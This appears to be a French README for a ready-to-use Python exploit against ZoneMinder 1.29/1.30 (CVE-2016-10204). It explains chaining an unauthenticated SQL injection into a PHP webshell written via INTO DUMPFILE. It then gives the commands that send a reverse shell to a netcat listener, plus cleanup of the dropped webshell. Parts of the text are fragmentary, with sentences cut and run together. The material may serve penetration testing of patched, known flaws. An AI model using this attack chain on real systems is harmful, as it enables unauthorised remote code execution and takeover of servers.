
Injection SQL non authentifiée menant à une exécution de code à distance (RCE) pour ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC en Python d'une injection SQL en une seule commande vers un webshell puis un reverse shell.
Un exploit Python prêt à l'emploi pour ZoneMinder 1.29/1.30 qui enchaîne l'injection SQL non authentifiée (CVE-2016-10204, EDB-41239) jusqu'à un shell inversé interactif.
Il s'agit d'un PoC weaponized/automatisé pour une CVE connue et corrigée, pas d'un nouvel exploit.
Le PoC EDB pour ce bug s'arrête à la charge utile SQLi ou à « pointez sqlmap dessus ». Cet exploit regroupe la chaîne complète SQLi vers webshell vers shell dans un seul script lisible.
SLEEP) sur le paramètre POST limit
de index.php?view=request&request=log&task=query.SELECT ... INTO DUMPFILE,
en essayant plusieurs chemins courants de ZoneMinder/Apache.bash vers votre
listener netcat.DUMPFILE, pas OUTFILE. OUTFILE échappe les retours à la ligne et altère
le PHP multi-ligne ; DUMPFILE écrit les octets bruts, donc le webshell reste valide.# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
# start your listener when prompted, in another terminal
sudo nc -lvnp 443
# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
MIT, voir LICENSE.